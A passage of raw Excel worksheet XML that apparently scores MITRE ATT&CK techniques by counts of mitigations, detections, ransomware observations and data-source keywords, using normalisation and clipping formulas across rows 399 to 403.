        <f t="array" ref="AF399">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC399)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG399" s="25">
        <f>IF(AF399="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH399" s="25" t="str" cm="1">
        <f t="array" ref="AH399">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC399)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI399" s="25">
        <f>IF(AH399="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ399" s="25" t="str" cm="1">
        <f t="array" ref="AJ399">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC399)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK399" s="25">
        <f>IF(AJ399="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL399" s="25" t="str" cm="1">
        <f t="array" ref="AL399">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC399)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM399" s="25">
        <f>IF(AL399="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN399" s="60">
        <v>0</v>
      </c>
      <c r="AO399" s="51">
        <v>0</v>
      </c>
      <c r="AP399" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AQ399" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.5555555555555559E-2</v>
      </c>
      <c r="AR399" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.5555555555555559E-2</v>
      </c>
      <c r="AS399" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT399" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU39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00" spans="1:47" ht="32.1">
      <c r="A400" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="B400" s="25">
        <f>SUM(H400,M400,V400)*(1+SUM(AE400,AG400,AI400,AK400,AM400))</f>
        <v>0.16666666666666669</v>
      </c>
      <c r="C400" s="25" t="s">
        <v>1546</v>
      </c>
      <c r="D400" s="25" t="s">
        <v>129</v>
      </c>
      <c r="E400" s="25" t="s">
        <v>1547</v>
      </c>
      <c r="F400" s="51">
        <v>1</v>
      </c>
      <c r="G400" s="51">
        <v>1</v>
      </c>
      <c r="H400" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I400">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J400">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K400">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L400">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M400" s="25">
        <v>0</v>
      </c>
      <c r="N400" s="51">
        <v>4</v>
      </c>
      <c r="O400" s="51">
        <v>3</v>
      </c>
      <c r="P400" s="51">
        <v>0</v>
      </c>
      <c r="Q400" s="51">
        <v>1</v>
      </c>
      <c r="R400" s="51">
        <v>4.0999999999999996</v>
      </c>
      <c r="S400" s="51">
        <v>1</v>
      </c>
      <c r="T400" s="52" t="s">
        <v>1548</v>
      </c>
      <c r="U400" s="51">
        <v>2</v>
      </c>
      <c r="V400" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>6.6666666666666666E-2</v>
      </c>
      <c r="W400">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>3</v>
      </c>
      <c r="X400">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>5.4545454545454543E-2</v>
      </c>
      <c r="Y400">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>5.4545454545454543E-2</v>
      </c>
      <c r="Z400">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>8</v>
      </c>
      <c r="AA400">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.08</v>
      </c>
      <c r="AB400">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.08</v>
      </c>
      <c r="AC400" s="29" t="s">
        <v>913</v>
      </c>
      <c r="AD400" s="25" t="str" cm="1">
        <f t="array" ref="AD400">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC400)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE400" s="25">
        <f>IF(AD400="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF400" s="25" t="str" cm="1">
        <f t="array" ref="AF400">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC400)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG400" s="25">
        <f>IF(AF400="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH400" s="25" t="str" cm="1">
        <f t="array" ref="AH400">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC400)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI400" s="25">
        <f>IF(AH400="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ400" s="25" t="str" cm="1">
        <f t="array" ref="AJ400">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC400)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK400" s="25">
        <f>IF(AJ400="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL400" s="25" t="str" cm="1">
        <f t="array" ref="AL400">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC400)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM400" s="25">
        <f>IF(AL400="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN400" s="52">
        <v>0</v>
      </c>
      <c r="AO400" s="51">
        <v>0</v>
      </c>
      <c r="AP400" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AQ400" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.5555555555555559E-2</v>
      </c>
      <c r="AR400" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.5555555555555559E-2</v>
      </c>
      <c r="AS400" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT400" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU40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01" spans="1:47" ht="32.1">
      <c r="A401" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.6190476190476189E-2</v>
      </c>
      <c r="B401" s="25">
        <f>SUM(H401,M401,V401)*(1+SUM(AE401,AG401,AI401,AK401,AM401))</f>
        <v>0.16190476190476191</v>
      </c>
      <c r="C401" s="25" t="s">
        <v>1549</v>
      </c>
      <c r="D401" s="25" t="s">
        <v>215</v>
      </c>
      <c r="E401" s="25" t="s">
        <v>1550</v>
      </c>
      <c r="F401" s="51">
        <v>1</v>
      </c>
      <c r="G401" s="51">
        <v>1</v>
      </c>
      <c r="H401" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I401">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J401">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K401">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L401">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M401" s="25">
        <v>0</v>
      </c>
      <c r="N401" s="51">
        <v>0</v>
      </c>
      <c r="O401" s="51">
        <v>1</v>
      </c>
      <c r="P401" s="51">
        <v>4</v>
      </c>
      <c r="Q401" s="51">
        <v>0</v>
      </c>
      <c r="R401" s="51">
        <v>5.2</v>
      </c>
      <c r="S401" s="51">
        <v>1</v>
      </c>
      <c r="T401" s="52" t="s">
        <v>216</v>
      </c>
      <c r="U401" s="51">
        <v>3</v>
      </c>
      <c r="V401" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>6.1904761904761907E-2</v>
      </c>
      <c r="W401">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>4</v>
      </c>
      <c r="X401">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>7.2727272727272724E-2</v>
      </c>
      <c r="Y401">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>7.2727272727272724E-2</v>
      </c>
      <c r="Z401">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA401">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB401">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC401" s="29" t="s">
        <v>178</v>
      </c>
      <c r="AD401" s="25" t="str" cm="1">
        <f t="array" ref="AD401">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC401)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE401" s="25">
        <f>IF(AD401="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF401" s="25" t="str" cm="1">
        <f t="array" ref="AF401">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC401)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG401" s="25">
        <f>IF(AF401="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH401" s="25" t="str" cm="1">
        <f t="array" ref="AH401">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC401)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI401" s="25">
        <f>IF(AH401="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ401" s="25" t="str" cm="1">
        <f t="array" ref="AJ401">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC401)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK401" s="25">
        <f>IF(AJ401="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL401" s="25" t="str" cm="1">
        <f t="array" ref="AL401">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC401)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM401" s="25">
        <f>IF(AL401="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN401" s="60">
        <v>0</v>
      </c>
      <c r="AO401" s="51">
        <v>0</v>
      </c>
      <c r="AP401" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.6190476190476189E-2</v>
      </c>
      <c r="AQ401" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.3968253968253971E-2</v>
      </c>
      <c r="AR401" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.3968253968253971E-2</v>
      </c>
      <c r="AS401" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT401" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU40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02" spans="1:47" ht="48">
      <c r="A402" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.8327619047619051E-2</v>
      </c>
      <c r="B402" s="25">
        <f>SUM(H402,M402,V402)*(1+SUM(AE402,AG402,AI402,AK402,AM402))</f>
        <v>0.18327619047619051</v>
      </c>
      <c r="C402" s="25" t="s">
        <v>1551</v>
      </c>
      <c r="D402" s="25" t="s">
        <v>152</v>
      </c>
      <c r="E402" s="25" t="s">
        <v>1552</v>
      </c>
      <c r="F402" s="51">
        <v>1</v>
      </c>
      <c r="G402" s="51">
        <v>1</v>
      </c>
      <c r="H402" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I402">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J402">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K402">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L402">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M402" s="25">
        <v>0</v>
      </c>
      <c r="N402" s="51">
        <v>0</v>
      </c>
      <c r="O402" s="51">
        <v>1</v>
      </c>
      <c r="P402" s="51">
        <v>0</v>
      </c>
      <c r="Q402" s="51">
        <v>0</v>
      </c>
      <c r="R402" s="52" t="s">
        <v>423</v>
      </c>
      <c r="S402" s="51">
        <v>3</v>
      </c>
      <c r="T402" s="52" t="s">
        <v>247</v>
      </c>
      <c r="U402" s="51">
        <v>3</v>
      </c>
      <c r="V402" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>6.19047619047619E-2</v>
      </c>
      <c r="W402">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>6</v>
      </c>
      <c r="X402">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Y402">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Z402">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA402">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB402">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC402" s="29" t="s">
        <v>1553</v>
      </c>
      <c r="AD402" s="25" t="str" cm="1">
        <f t="array" ref="AD402">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC402)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE402" s="25">
        <f>IF(AD402="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF402" s="25" t="str" cm="1">
        <f t="array" ref="AF402">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC402)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG402" s="25">
        <f>IF(AF402="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH402" s="25" t="str" cm="1">
        <f t="array" ref="AH402">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC402)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI402" s="25">
        <f>IF(AH402="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ402" s="25" t="str" cm="1">
        <f t="array" ref="AJ402">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC402)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK402" s="25">
        <f>IF(AJ402="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL402" s="25" t="str" cm="1">
        <f t="array" ref="AL402">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC402)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM402" s="25">
        <f>IF(AL402="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN402" s="52">
        <v>0</v>
      </c>
      <c r="AO402" s="51">
        <v>0</v>
      </c>
      <c r="AP402" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.8327619047619051E-2</v>
      </c>
      <c r="AQ402" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.1092063492063503E-2</v>
      </c>
      <c r="AR402" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.1092063492063503E-2</v>
      </c>
      <c r="AS402" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT402" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU40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03" spans="1:47">
      <c r="A403" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.6190476190476189E-2</v>
      </c>
      <c r="B403" s="25">
        <f>SUM(H403,M403,V403)*(1+SUM(AE403,AG403,AI403,AK403,AM403))</f>
        <v>0.16190476190476191</v>
      </c>
      <c r="C403" s="25" t="s">
        <v>1554</v>
      </c>
      <c r="D403" s="25" t="s">
        <v>1016</v>
      </c>
      <c r="E403" s="25" t="s">
        <v>1555</v>
      </c>
      <c r="F403" s="51">
        <v>1</v>
      </c>
      <c r="G403" s="51">
        <v>1</v>
      </c>
      <c r="H403" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I403">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J403">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K403">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L403">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M403" s="25">
        <v>0</v>
      </c>
      <c r="N403" s="51">
        <v>0</v>
      </c>
      <c r="O403" s="51">
        <v>1</v>
      </c>
      <c r="P403" s="51">
        <v>0</v>
      </c>
      <c r="Q403" s="51">
        <v>0</v>
      </c>
      <c r="R403" s="52" t="s">
        <v>1017</v>
      </c>
      <c r="S403" s="51">
        <v>3</v>
      </c>
      <c r="T403" s="52" t="s">
        <v>1477</v>
      </c>
      <c r="U403" s="51">
        <v>3</v>
      </c>
      <c r="V403" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>6.19047619047619E-2</v>
      </c>
      <c r="W403">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>6</v>
      </c>
      <c r="X403">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Y403">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Z403">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA403">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB403">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC403" s="29" t="s">
        <v>341</v>
      </c>
      <c r="AD403" s="25" t="str" cm="1">
        <f t="array" ref="AD403">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC403)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE403" s="25">
        <f>IF(AD403="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF403" s="25" t="str" cm="1">
        <f t="array" ref="AF403">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC403)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG403" s="25">
        <f>IF(AF403="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH403" s="25" t="str" cm="1">
        <f t="array" ref="AH403">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC403)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI403" s="25">
        <f>IF(AH403="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ403" s="25" t="str" cm="1">
        <f t="array" ref="AJ403">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC403)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK403" s="25">
        <f>IF(AJ403="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL403" s="25" t="str" cm="1">
        <f t="array" ref="AL403">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC403)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM403" s="25">
        <f>IF(AL403="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN403" s="60">
        <v>0</v>
      </c>
      <c r="AO403" s="51">
        <v>0</v>
      </c>
      <c r="AP403" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.6190476190476189E-2</v>
      </c>
      <c r="AQ403" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.3968253968253971E-2</v>
      </c>
      <c r="AR403" s="25">
